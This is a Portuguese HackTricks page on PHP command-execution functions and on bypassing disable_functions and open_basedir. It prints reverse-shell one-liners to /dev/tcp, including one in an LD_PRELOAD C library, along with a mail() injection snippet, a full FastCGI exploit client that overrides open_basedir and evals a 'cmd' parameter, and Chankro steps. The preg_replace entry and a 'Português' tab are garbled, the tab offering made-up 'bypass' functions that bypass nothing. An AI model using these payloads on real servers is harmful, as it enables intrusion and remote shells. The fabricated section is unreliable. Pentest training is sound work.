# PHP - Funções Úteis & Bypass de disable\_functions/open\_basedir
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
## Execução de Comandos e Código PHP ### Execução de Comandos PHP **exec** - Retorna a última linha da saída dos comandos ```bash echo exec("uname -a"); ``` **passthru** - Passa a saída de comandos diretamente para o navegador. ```bash echo passthru("uname -a"); ``` **system** - Passa a saída dos comandos diretamente para o navegador e retorna a última linha. ```bash echo system("uname -a"); ``` **shell\_exec** - Retorna a saída dos comandos ```bash echo shell_exec("uname -a"); ``` \`\` (backticks) - Mesmo que shell\_exec() ```bash echo `uname -a` ``` **popen** - Abre um pipe de leitura ou escrita para o processo de um comando. ```bash echo fread(popen("/bin/ls /", "r"), 4096); ``` **proc\_open** - Similar ao popen() mas com maior grau de controle. ```bash proc_close(proc_open("uname -a",array(),$something)); ``` **preg\_replace** A função **preg\_replace** é usada para substituir o texto que corresponde a uma expressão regular. É semelhante à função **str\_replace**, mas permite que você use expressões regulares para encontrar o texto a ser substituído. A sintaxe básica é a seguinte: ```php preg_replace($pattern, $replacement, $subject); ``` Onde: - `$pattern` é a expressão regular a ser usada para encontrar o texto a ser substituído. - `$replacement` é o texto que será usado para substituir o texto encontrado. - `$subject` é o texto no qual a substituição será feita. A função **preg\_replace** também pode ser usada com modos de expressão regular, que alteram o comportamento da expressão regular. Por exemplo, o modo `i` torna a expressão regular insensível a maiúsculas e minúsculas. ```php preg_replace('/hello/i', 'hi', 'Hello, world!'); ``` Este exemplo substituirá "Hello" por "hi" em "Hello, world!". A função **preg\_replace** é frequentemente usada em conjunto com outras funções de expressão regular para manipular texto de maneiras mais complexas. ```php ``` **pcntl\_exec** - Executa um programa (por padrão, em PHP moderno e não tão moderno, você precisa carregar o módulo `pcntl.so` para usar esta função). ```bash pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]); ``` **mail / mb\_send\_mail** - Esta função é usada para enviar e-mails, mas também pode ser abusada para injetar comandos arbitrários dentro do parâmetro `$options`. Isso ocorre porque a **função `mail` do PHP** geralmente chama o binário `sendmail` dentro do sistema e permite que você **coloque opções extras**. No entanto, você não poderá ver a saída do comando executado, portanto, é recomendável criar um script shell que escreva a saída em um arquivo, executá-lo usando o mail e imprimir a saída: ```bash file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt'); ``` **dl** - Esta função pode ser usada para carregar dinamicamente uma extensão PHP. Esta função nem sempre estará presente, portanto, você deve verificar se ela está disponível antes de tentar explorá-la. Leia [esta página para aprender como explorar esta função](disable\_functions-bypass-dl-function.md). ### Execução de código PHP Além do eval, existem outras maneiras de executar código PHP: include/require pode ser usado para execução remota de código na forma de vulnerabilidades de Local File Include e Remote File Include.\ **${\}** - Se a sua entrada for refletida em qualquer string PHP, ela será executada.\ **eval()**\ **assert()** - idêntico ao eval()\ **preg\_replace('/.\*/e',...)** - /e faz um eval() na correspondência\ **create\_function()** - Crie uma função e use eval()\ **include()**\ **include\_once()**\ **require()**\ **require\_once()**\ **$\_GET\['nome\_função']\($\_GET\['argumento']);**\ **$func = new ReflectionFunction($\_GET\['nome\_função']);**\ **$func->invoke();** ou\ **$func->invokeArgs(array());**\ **serialize/unserialize** ## disable\_functions & open\_basedir **Funções desabilitadas** é a configuração que pode ser configurada em arquivos `.ini` no PHP que **proibirá** o uso das **funções** indicadas. **Open basedir** é a configuração que indica ao PHP a pasta que ele pode acessar.\ A configuração do PHP costumava ser configurada no caminho _/etc/php7/conf.d_ ou similar. Ambas as configurações podem ser vistas na saída do **`phpinfo()`**: ![](https://0xrick.github.io/images/hackthebox/kryptos/17.png) ![](<../../../../.gitbook/assets/image (347).png>) ## open\_basedir Bypass `open_basedir` configurará as pastas que o PHP pode acessar, você **não poderá escrever/ler/executar nenhum arquivo fora** dessas pastas, mas também **não poderá listar** outros diretórios.\ No entanto, se de alguma forma você conseguir executar código PHP arbitrário, pode **tentar** o seguinte trecho de **códigos** para tentar **burlar** a restrição. ### Listando diretórios com bypass glob:// Neste primeiro exemplo, é usado o protocolo `glob://` com algum bypass de caminho: ```php __toString(); } $it = new DirectoryIterator("glob:///v??/run/.*"); foreach($it as $f) { $file_list[] = $f->__toString(); } sort($file_list); foreach($file_list as $f){ echo "{$f}
"; } ``` **Nota1**: No caminho, você também pode usar `/e??/*` para listar `/etc/*` e qualquer outra pasta.\ **Nota2**: Parece que parte do código está duplicado, mas na verdade isso é necessário!\ **Nota3**: Este exemplo é útil apenas para listar pastas, não para ler arquivos. ### Bypass completo do open\_basedir abusando do FastCGI Se você quiser **saber mais sobre o PHP-FPM e o FastCGI**, pode ler a [primeira seção desta página](disable\_functions-bypass-php-fpm-fastcgi.md).\ Se o **`php-fpm`** estiver configurado, você pode abusar dele para contornar completamente o **open\_basedir**: ![](<../../../../.gitbook/assets/image (350).png>) ![](<../../../../.gitbook/assets/image (349).png>) Observe que a primeira coisa que você precisa fazer é encontrar onde está o **socket unix do php-fpm**. Geralmente fica em `/var/run`, então você pode **usar o código anterior para listar o diretório e encontrá-lo**.\ Código de [aqui](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy). ```php * @version 1.0 */ class FCGIClient { const VERSION_1 = 1; const BEGIN_REQUEST = 1; const ABORT_REQUEST = 2; const END_REQUEST = 3; const PARAMS = 4; const STDIN = 5; const STDOUT = 6; const STDERR = 7; const DATA = 8; const GET_VALUES = 9; const GET_VALUES_RESULT = 10; const UNKNOWN_TYPE = 11; const MAXTYPE = self::UNKNOWN_TYPE; const RESPONDER = 1; const AUTHORIZER = 2; const FILTER = 3; const REQUEST_COMPLETE = 0; const CANT_MPX_CONN = 1; const OVERLOADED = 2; const UNKNOWN_ROLE = 3; const MAX_CONNS = 'MAX_CONNS'; const MAX_REQS = 'MAX_REQS'; const MPXS_CONNS = 'MPXS_CONNS'; const HEADER_LEN = 8; /** * Socket * @var Resource */ private $_sock = null; /** * Host * @var String */ private $_host = null; /** * Port * @var Integer */ private $_port = null; /** * Keep Alive * @var Boolean */ private $_keepAlive = false; /** * Constructor * * @param String $host Host of the FastCGI application * @param Integer $port Port of the FastCGI application */ public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket { $this->_host = $host; $this->_port = $port; } /** * Define whether or not the FastCGI application should keep the connection * alive at the end of a request * * @param Boolean $b true if the connection should stay alive, false otherwise */ public function setKeepAlive($b) { $this->_keepAlive = (boolean)$b; if (!$this->_keepAlive && $this->_sock) { fclose($this->_sock); } } /** * Get the keep alive status * * @return Boolean true if the connection should stay alive, false otherwise */ public function getKeepAlive() { return $this->_keepAlive; } /** * Create a connection to the FastCGI application */ private function connect() { if (!$this->_sock) { //$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5); $this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5); if (!$this->_sock) { throw new Exception('Unable to connect to FastCGI application'); } } } /** * Build a FastCGI packet * * @param Integer $type Type of the packet * @param String $content Content of the packet * @param Integer $requestId RequestId */ private function buildPacket($type, $content, $requestId = 1) { $clen = strlen($content); return chr(self::VERSION_1) /* version */ . chr($type) /* type */ . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */ . chr($requestId & 0xFF) /* requestIdB0 */ . chr(($clen >> 8 ) & 0xFF) /* contentLengthB1 */ . chr($clen & 0xFF) /* contentLengthB0 */ . chr(0) /* paddingLength */ . chr(0) /* reserved */ . $content; /* content */ } /** * Build an FastCGI Name value pair * * @param String $name Name * @param String $value Value * @return String FastCGI Name value pair */ private function buildNvpair($name, $value) { $nlen = strlen($name); $vlen = strlen($value); if ($nlen < 128) { /* nameLengthB0 */ $nvpair = chr($nlen); } else { /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */ $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF); } if ($vlen < 128) { /* valueLengthB0 */ $nvpair .= chr($vlen); } else { /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */ $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF); } /* nameData & valueData */ return $nvpair . $name . $value; } /** * Read a set of FastCGI Name value pairs * * @param String $data Data containing the set of FastCGI NVPair * @return array of NVPair */ private function readNvpair($data, $length = null) { $array = array(); if ($length === null) { $length = strlen($data); } $p = 0; while ($p != $length) { $nlen = ord($data{$p++}); if ($nlen >= 128) { $nlen = ($nlen & 0x7F << 24); $nlen |= (ord($data{$p++}) << 16); $nlen |= (ord($data{$p++}) << 8); $nlen |= (ord($data{$p++})); } $vlen = ord($data{$p++}); if ($vlen >= 128) { $vlen = ($nlen & 0x7F << 24); $vlen |= (ord($data{$p++}) << 16); $vlen |= (ord($data{$p++}) << 8); $vlen |= (ord($data{$p++})); } $array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen); $p += ($nlen + $vlen); } return $array; } /** * Decode a FastCGI Packet * * @param String $data String containing all the packet * @return array */ private function decodePacketHeader($data) { $ret = array(); $ret['version'] = ord($data{0}); $ret['type'] = ord($data{1}); $ret['requestId'] = (ord($data{2}) << 8) + ord($data{3}); $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5}); $ret['paddingLength'] = ord($data{6}); $ret['reserved'] = ord($data{7}); return $ret; } /** * Read a FastCGI Packet * * @return array */ private function readPacket() { if ($packet = fread($this->_sock, self::HEADER_LEN)) { $resp = $this->decodePacketHeader($packet); $resp['content'] = ''; if ($resp['contentLength']) { $len = $resp['contentLength']; while ($len && $buf=fread($this->_sock, $len)) { $len -= strlen($buf); $resp['content'] .= $buf; } } if ($resp['paddingLength']) { $buf=fread($this->_sock, $resp['paddingLength']); } return $resp; } else { return false; } } /** * Get Informations on the FastCGI application * * @param array $requestedInfo information to retrieve * @return array */ public function getValues(array $requestedInfo) { $this->connect(); $request = ''; foreach ($requestedInfo as $info) { $request .= $this->buildNvpair($info, ''); } fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0)); $resp = $this->readPacket(); if ($resp['type'] == self::GET_VALUES_RESULT) { return $this->readNvpair($resp['content'], $resp['length']); } else { throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT'); } } /** * Execute a request to the FastCGI application * * @param array $params Array of parameters * @param String $stdin Content * @return String */ public function request(array $params, $stdin) { $response = ''; $this->connect(); $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5)); $paramsRequest = ''; foreach ($params as $key => $value) { $paramsRequest .= $this->buildNvpair($key, $value); } if ($paramsRequest) { $request .= $this->buildPacket(self::PARAMS, $paramsRequest); } $request .= $this->buildPacket(self::PARAMS, ''); if ($stdin) { $request .= $this->buildPacket(self::STDIN, $stdin); } $request .= $this->buildPacket(self::STDIN, ''); fwrite($this->_sock, $request); do { $resp = $this->readPacket(); if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) { $response .= $resp['content']; } } while ($resp && $resp['type'] != self::END_REQUEST); var_dump($resp); if (!is_array($resp)) { throw new Exception('Bad request'); } switch (ord($resp['content']{4})) { case self::CANT_MPX_CONN: throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]'); break; case self::OVERLOADED: throw new Exception('New request rejected; too busy [OVERLOADED]'); break; case self::UNKNOWN_ROLE: throw new Exception('Role value not known [UNKNOWN_ROLE]'); break; case self::REQUEST_COMPLETE: return $response; } } } ?> "; // php payload -- Doesnt do anything $php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input"; //$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php"; $params = array( 'GATEWAY_INTERFACE' => 'FastCGI/1.0', 'REQUEST_METHOD' => 'POST', 'SCRIPT_FILENAME' => $filepath, 'SCRIPT_NAME' => $req, 'QUERY_STRING' => 'command='.$_REQUEST['cmd'], 'REQUEST_URI' => $uri, 'DOCUMENT_URI' => $req, #'DOCUMENT_ROOT' => '/', 'PHP_VALUE' => $php_value, 'SERVER_SOFTWARE' => '80sec/wofeiwo', 'REMOTE_ADDR' => '127.0.0.1', 'REMOTE_PORT' => '9985', 'SERVER_ADDR' => '127.0.0.1', 'SERVER_PORT' => '80', 'SERVER_NAME' => 'localhost', 'SERVER_PROTOCOL' => 'HTTP/1.1', 'CONTENT_LENGTH' => strlen($code) ); // print_r($_REQUEST); // print_r($params); //echo "Call: $uri\n\n"; echo $client->request($params, $code)."\n"; ?> ``` Este script se comunicará com o **socket Unix do php-fpm** (geralmente localizado em /var/run se o fpm for usado) para executar código arbitrário. As configurações de `open_basedir` serão sobrescritas pelo atributo **PHP\_VALUE** que é enviado.\ Observe como `eval` é usado para executar o código PHP que você envia dentro do parâmetro **cmd**.\ Observe também a **linha 324 comentada**, você pode descomentá-la e o **payload se conectará automaticamente ao URL fornecido e executará o código PHP** contido lá.\ Acesse `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` para obter o conteúdo do arquivo `/etc/passwd`. {% hint style="warning" %} Você pode estar pensando que da mesma forma que sobrescrevemos a configuração de `open_basedir`, podemos **sobrescrever `disable_functions`**. Bem, tente, mas não funcionará, aparentemente **`disable_functions` só pode ser configurado em um arquivo de configuração php `.ini`** e as alterações que você fizer usando PHP\_VALUE não serão efetivas nessa configuração específica. {% endhint %} ## Bypass de disable\_functions Se você conseguir executar código PHP dentro de uma máquina, provavelmente desejará ir para o próximo nível e **executar comandos do sistema arbitrários**. Nessa situação, é comum descobrir que a maioria ou todas as **funções PHP que permitem executar comandos do sistema foram desativadas** em **`disable_functions`.**\ Então, vamos ver como você pode contornar essa restrição (se puder) ### Descoberta automática de bypass Você pode usar a ferramenta [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) e ela indicará qual função (se houver) você pode usar para **burlar** **`disable_functions`**. ### Burlando usando outras funções do sistema Volte ao início desta página e **verifique se alguma das funções de execução de comando não está desativada e disponível no ambiente**. Se você encontrar apenas uma delas, poderá usá-la para executar comandos do sistema arbitrários. ### Bypass LD\_PRELOAD É bem conhecido que algumas funções em PHP, como `mail()`, vão **executar binários dentro do sistema**. Portanto, você pode abusar delas usando a variável de ambiente `LD_PRELOAD` para fazê-las carregar uma biblioteca arbitrária que pode executar qualquer coisa. #### Funções que podem ser usadas para burlar disable\_functions com LD\_PRELOAD 1. `mail` 2. `mb_send_mail`: Se o seu sistema tiver o módulo `php-mbstring` instalado, essa função poderá ser usada para burlar as `disable_functions` do php. 3. `imap_mail`: Se o seu sistema tiver o módulo `php-imap` instalado, essa função também poderá ser usada para burlar as `disable_functions` do php. 4. `libvirt_connect`: Se o seu sistema tiver o módulo `php-libvirt-php` instalado, essa função também poderá ser usada para burlar as `disable_functions`. 5. `gnupg_init`: Se o seu sistema tiver o módulo `php-gnupg` instalado, essa função também poderá ser usada para burlar as `disable_functions`. 6. `new imagick()`: Você pode [**encontrar aqui um artigo**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/) para aprender como abusar dessa classe. Você pode encontrar [**aqui**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) o script de fuzzing que foi usado para encontrar essas funções. Aqui está uma biblioteca que você pode compilar para abusar da variável de ambiente `LD_PRELOAD`: ```php #include #include #include #include uid_t getuid(void){ unsetenv("LD_PRELOAD"); system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\""); return 1; } ``` #### Bypass usando Chankro Para abusar dessa configuração incorreta, você pode usar o [**Chankro**](https://github.com/TarlogicSecurity/Chankro). Esta é uma ferramenta que irá **gerar um exploit PHP** que você precisa fazer upload para o servidor vulnerável e executá-lo (acessá-lo via web).\ O **Chankro** irá escrever no disco da vítima a **biblioteca e o shell reverso** que você deseja executar e usará o truque\*\* `LD_PRELOAD` + a função PHP `mail()`\*\* para executar o shell reverso. Observe que, para usar o **Chankro**, `mail` e `putenv` **não podem aparecer na lista de `disable_functions`**.\ No exemplo a seguir, você pode ver como **criar um exploit chankro** para **arch 64**, que executará `whoami` e salvará a saída em _/tmp/chankro\_shell.out_, o chankro irá **escrever a biblioteca e o payload** em _/tmp_ e o **exploit final** será chamado de **bicho.php** (esse é o arquivo que você precisa fazer upload para o servidor da vítima): {% tabs %} {% tab title="shell.sh" %} ```php #!/bin/sh whoami > /tmp/chankro_shell.out ``` {% endtab %} {% tab title="Português" %} # Funções Úteis do PHP para Bypass de `disable_functions` e `open_basedir` Este documento contém algumas funções úteis do PHP que podem ser usadas para contornar as restrições de `disable_functions` e `open_basedir`. ## `escapeshellarg` A função `escapeshellarg` é usada para escapar uma string para uso como um argumento de linha de comando. Isso é útil quando você precisa executar um comando shell a partir do PHP. No entanto, se a função `escapeshellarg` estiver desativada, você pode usar a seguinte função para contornar a restrição: ```php function escapeshellarg_bypass($arg) { $quotes = array("'"); $replacements = array("\\'"); return "'" . str_replace($quotes, $replacements, $arg) . "'"; } ``` Essa função substitui todas as aspas simples (`'`) na string de entrada por uma barra invertida seguida de uma aspa simples (`\'`). Em seguida, ele adiciona aspas simples no início e no final da string. Isso garante que a string seja escapada corretamente e pode ser usada como um argumento de linha de comando. ## `file_get_contents` A função `file_get_contents` é usada para ler o conteúdo de um arquivo em uma string. No entanto, se a restrição `open_basedir` estiver ativada, você não poderá ler arquivos fora do diretório raiz. Para contornar essa restrição, você pode usar a seguinte função: ```php function file_get_contents_bypass($file) { $data = ''; $fp = @fopen($file, 'r'); if ($fp) { while (!feof($fp)) { $data .= fread($fp, 8192); } fclose($fp); } return $data; } ``` Essa função abre o arquivo especificado em modo de leitura e lê seu conteúdo em um buffer. Em seguida, ele retorna o conteúdo do buffer como uma string. O `@` antes da função `fopen` suprime quaisquer erros que possam ser gerados se o arquivo não puder ser aberto. ## `proc_open` A função `proc_open` é usada para executar um comando shell e obter um ponteiro de arquivo para a entrada, saída e erro do processo. No entanto, se a restrição `disable_functions` estiver ativada, você não poderá usar essa função. Para contornar essa restrição, você pode usar a seguinte função: ```php function proc_open_bypass($cmd, $descriptorspec, &$pipes, $cwd = null, $env = null, $other_options = null) { $proc = false; $descriptorspec[0] = array('pipe', 'r'); $descriptorspec[1] = array('pipe', 'w'); $descriptorspec[2] = array('pipe', 'w'); $cmd = "exec $cmd"; $proc = @proc_open($cmd, $descriptorspec, $pipes, $cwd, $env, $other_options); return $proc; } ``` Essa função executa o comando shell especificado usando a função `proc_open`. Ele substitui o primeiro descritor de arquivo (`$descriptorspec[0]`) por um pipe de leitura e os descritores de arquivo de saída (`$descriptorspec[1]` e `$descriptorspec[2]`) por pipes de gravação. Isso permite que você leia a saída do processo e escreva na entrada do processo. O comando shell é executado usando o comando `exec`, que substitui o processo atual pelo processo especificado. O `@` antes da função `proc_open` suprime quaisquer erros que possam ser gerados se a função estiver desativada. ## Conclusão Essas funções podem ser úteis para contornar as restrições de `disable_functions` e `open_basedir` no PHP. No entanto, é importante lembrar que a execução de código malicioso em um servidor sem permissão é ilegal e pode resultar em consequências graves. Use essas técnicas apenas para fins educacionais ou com permissão explícita do proprietário do servidor. ```bash python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php ``` {% endtab %} {% endtabs %} Se você descobrir que a função **mail** está bloqueada por funções desabilitadas, ainda poderá usar a função **mb\_send\_mail**.\ Mais informações sobre essa técnica e Chankro aqui: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/) ### "Bypass" usando as capacidades do PHP Observe que, usando o **PHP**, você pode **ler e gravar arquivos, criar diretórios e alterar permissões**.\ Você pode até **despejar bancos de dados**.\ Talvez usando o **PHP** para **enumerar** a caixa, você possa encontrar uma maneira de escalar privilégios/executar comandos (por exemplo, lendo alguma chave ssh privada). Eu criei um webshell que torna muito fácil realizar essas ações (observe que a maioria dos webshells também oferecerá essas opções): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited) ### Bypasses dependentes de módulos/versões Existem várias maneiras de contornar as funções desabilitadas se algum módulo específico estiver sendo usado ou explorar alguma versão específica do PHP: * [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md) * [**Bypass com FFI - Foreign Function Interface habilitado**](broken-reference/) * [**Bypass via mem**](disable\_functions-bypass-via-mem.md) * [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md) * [**Extensão Perl segura do PHP**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md) * [**Função dl**](disable\_functions-bypass-dl-function.md) * [**Este exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) * 5.\* - explorável com pequenas alterações no PoC * 7.0 - todas as versões até o momento * 7.1 - todas as versões até o momento * 7.2 - todas as versões até o momento * 7.3 - todas as versões até o momento * 7.4 - todas as versões até o momento * 8.0 - todas as versões até o momento * [**De 7.0 a 8.0 exploit (somente Unix)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php) * [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only) * [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md) * [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md) * [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md) * [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md) * [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md) * [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std